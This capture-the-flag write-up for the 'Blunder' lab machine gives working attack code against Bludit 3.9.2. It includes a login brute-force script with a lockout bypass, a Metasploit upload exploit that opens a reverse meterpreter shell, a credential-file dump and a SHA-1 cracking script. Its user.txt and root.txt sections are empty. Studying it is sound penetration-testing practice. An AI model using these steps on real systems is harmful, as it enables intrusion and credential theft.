Blunder

Enumeration

nmap

$ nmap -sC -sV -oN nmap.txt 10.10.10.191

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 21:56 BST
Nmap scan report for 10.10.10.191
Host is up (0.066s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds

Apache httpd 2.4.41

dirsearch

$ ./dirsearch.py -u 10.10.10.191 -e *

[21:28:51] 200 -    7KB - /0
[21:28:56] 200 -    3KB - /about
[21:28:58] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[21:29:00] 200 -    2KB - /admin/
[21:29:00] 200 -    2KB - /admin/.config
[21:29:00] 200 -    2KB - /admin/?/login
...
...
...
[21:29:03] 200 -    2KB - /admin/web/
[21:29:03] 200 -    2KB - /admin/user_count.txt
[21:29:03] 200 -    2KB - /admin/uploads.php
[21:29:31] 301 -    0B  - /domcfg.nsf/?open  ->  http://10.10.10.191/domcfg.nsf
[21:29:42] 200 -   30B  - /install.php
[21:29:45] 200 -    1KB - /LICENSE
[21:30:03] 200 -    3KB - /README.md
[21:30:04] 200 -   22B  - /robots.txt

wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

===================================================================
ID           Response   Lines    Word     Chars       Payload                                      
===================================================================

000003519:   200        1 L      4 W      22 Ch       "robots"                                     
000004125:   200        4 L      23 W     118 Ch      "todo"    

Potential username: fergus

After extensive enumeration, the only useful information found was the todo.txt file (the 118-byte hit from wfuzz above), which contains a possible username (fergus).

Creating wordlist with cewl

$ cewl -w wordlists.txt -d 10 -m 1 10.10.10.191/

Bruteforcing login credentials

With the username fergus and the cewl wordlist built from the site's own text, brute-force the Bludit admin login; the password recovered this way is the one supplied as BLUDITPASS to Metasploit below.
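The brute-force step itself, as an added example for these notes (not code from the original writeup or from Bludit). The target, username and wordlist filename come from the commands above; everything else is an assumption drawn from the Bludit 3.9.2 source rather than from this page: the login form fields (tokenCSRF, username, password, save), the 302 to /admin/dashboard on success, and the fact that 3.9.2 keys its failed-login lockout on the client-supplied X-Forwarded-For header (CVE-2019-17240), which is why a fresh spoofed address is sent with every guess.

```python
"""Brute-force the Bludit admin login for user fergus with the cewl wordlist.

Added example for these notes, not code from the writeup or from Bludit.
Assumed from the Bludit 3.9.2 source (not stated on the page): form field
names, the 302 to /admin/dashboard on success, and the per-IP lockout being
keyed on X-Forwarded-For (CVE-2019-17240).
"""
import http.cookiejar
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

TARGET = "http://10.10.10.191"
USERNAME = "fergus"
WORDLIST = "wordlists.txt"  # output of the cewl command above

# Bludit renders: <input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="...">
CSRF_RE = re.compile(r'name="tokenCSRF"[^>]*\bvalue="([^"]+)"')


def extract_csrf_token(html: str) -> Optional[str]:
    """Return the tokenCSRF hidden-field value from the login page, or None."""
    m = CSRF_RE.search(html)
    return m.group(1) if m else None


def login_succeeded(status: int, location: Optional[str]) -> bool:
    """A valid login is a 302 to /admin/dashboard; a bad one re-renders the form with 200."""
    return status in (301, 302) and bool(location) and location.rstrip("/").endswith("/admin/dashboard")


def spoofed_ip(i: int) -> str:
    """Distinct X-Forwarded-For value per attempt so the per-IP lockout never trips."""
    return f"10.{(i >> 16) & 255}.{(i >> 8) & 255}.{i & 255}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses instead of following them, so the Location header is visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def build_opener() -> urllib.request.OpenerDirector:
    """Cookie-aware opener that does not follow redirects."""
    jar = http.cookiejar.CookieJar()
    return urllib.request.build_opener(_NoRedirect, urllib.request.HTTPCookieProcessor(jar))


def attempt(opener, password: str, client_ip: str) -> bool:
    """One login attempt: fetch a fresh CSRF token, post the guess, inspect the redirect."""
    login_url = f"{TARGET}/admin/login"
    page = opener.open(login_url).read().decode("utf-8", "replace")
    token = extract_csrf_token(page)
    if token is None:
        raise RuntimeError("login page carried no tokenCSRF field")
    body = urllib.parse.urlencode(
        {"tokenCSRF": token, "username": USERNAME, "password": password, "save": ""}
    ).encode()
    req = urllib.request.Request(
        login_url, data=body,
        headers={"X-Forwarded-For": client_ip, "Referer": login_url},
    )
    try:
        resp = opener.open(req)
        return login_succeeded(resp.status, resp.headers.get("Location"))
    except urllib.error.HTTPError as err:  # 3xx lands here because of _NoRedirect
        return login_succeeded(err.code, err.headers.get("Location"))


if __name__ == "__main__":
    with open(WORDLIST, encoding="utf-8", errors="ignore") as fh:
        words = list(dict.fromkeys(w.strip() for w in fh if w.strip()))
    opener = build_opener()
    for i, guess in enumerate(words):
        if attempt(opener, guess, spoofed_ip(i)):
            print(f"[+] {USERNAME}:{guess}")
            break
    else:
        print("[-] wordlist exhausted")
```

Fetching the login page before every POST matters: Bludit rejects a stale or missing tokenCSRF before it ever checks the password, so a plain hydra-style loop against the POST alone reports every guess as a failure. The spoofed address is the brute-force mitigation bypass; on a patched Bludit the lockout would trigger after a handful of attempts regardless of the header.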

Exploitation

Metasploit

msf5 > use exploit/linux/http/bludit_upload_images_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.17.168   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2


msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191
rhosts => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus
bludituser => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain
bluditpass => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.189
lhost => 10.10.14.189
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 10.10.14.189:4444 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading BamMBogTOe.png...
[*] Uploading .htaccess...
[*] Executing BamMBogTOe.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.189:4444 -> 10.10.10.191:43256) at 2020-08-16 22:46:40 +0100
[+] Deleted .htaccess

meterpreter > ls
Listing: /var/www/bludit-3.9.2/bl-content/tmp
=============================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-08-16 22:52:22 +0100  thumbnails

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2020-05-26 09:29:29 +0100  hugo
40755/rwxr-xr-x  4096  dir   2020-04-28 12:13:35 +0100  shaun

PrivEsc

meterpreter > shell
Process 3417 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/$ ls
bin    dev  home   lib64       media  proc  sbin  sys  var
boot   etc  lib    libx32      mnt    root  snap  tmp
cdrom  ftp  lib32  lost+found  opt    run   srv   usr
www-data@blunder:/$ cd var
www-data@blunder:/var$ ls
backups  crash  local  log   metrics  run   spool  www
cache    lib    lock   mail  opt      snap  tmp
www-data@blunder:/var$ cd www
www-data@blunder:/var/www$ ls
bludit-3.10.0a  bludit-3.9.2  html
www-data@blunder:/var/www$ cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
LICENSE    bl-content  bl-languages  bl-themes  install.php
README.md  bl-kernel   bl-plugins    index.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
databases  pages  tmp  uploads  workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
categories.php  plugins       site.php    tags.php
pages.php       security.php  syslog.php  users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

User: Hugo (Bludit account key "admin", matching the /home/hugo directory seen earlier). The "password" value faca404fd5c0a31cf1897b823c695c85cffeb98d is not a cleartext password but the stored hash: Bludit keeps sha1(password . salt), and this record has no salt field, so it is a plain, unsalted SHA-1 of hugo's password that has to be cracked offline before it can be used.
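Offline check of that hash against a wordlist, as an added example for these notes (not code from the writeup or from Bludit). The hash is copied from users.php above; the hashing scheme (SHA-1 of the password concatenated with the per-user salt, an absent salt meaning plain SHA-1) is taken from Bludit's source rather than from this page, and the wordlist paths are assumptions.

```python
"""Offline wordlist check of the hash recovered from users.php.

Added example for these notes, not code from the writeup or from Bludit.
Assumed from Bludit's source: passwords are stored as sha1(password . salt),
and a record without a salt field is plain sha1(password). Wordlist paths
below are assumptions.
"""
import hashlib
from typing import Iterable, Optional

# hugo's hash, copied from bl-content/databases/users.php above
TARGET_HASH = "faca404fd5c0a31cf1897b823c695c85cffeb98d"


def bludit_hash(password: str, salt: str = "") -> str:
    """Bludit stores sha1(password . salt); the concatenation order matters when a salt exists."""
    return hashlib.sha1((password + salt).encode("utf-8")).hexdigest()


def crack(target_hash: str, candidates: Iterable[str], salt: str = "") -> Optional[str]:
    """Return the first candidate whose Bludit hash equals target_hash, else None."""
    target = target_hash.strip().lower()
    if len(target) != 40:
        raise ValueError("expected a 40-hex-char SHA-1 digest")
    for cand in candidates:
        cand = cand.rstrip("\r\n")  # wordlist lines keep their newline
        if bludit_hash(cand, salt) == target:
            return cand
    return None


if __name__ == "__main__":
    # The site-derived cewl list first, then a general list (paths are assumptions).
    for path in ("wordlists.txt", "/usr/share/wordlists/rockyou.txt"):
        try:
            with open(path, encoding="latin-1") as fh:
                hit = crack(TARGET_HASH, fh)
        except FileNotFoundError:
            continue
        if hit is not None:
            print(f"[+] hugo:{hit} (from {path})")
            break
    else:
        print("[-] no match; try a larger list with hashcat -m 100 (raw SHA-1)")
```

For a record that does carry a "salt" entry, pass it as the salt argument; hashing the password alone will never match a salted entry, which is the usual reason a Bludit hash "refuses to crack" even when the password is in the list.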

Getting user.txt

Getting root.txt

Last updated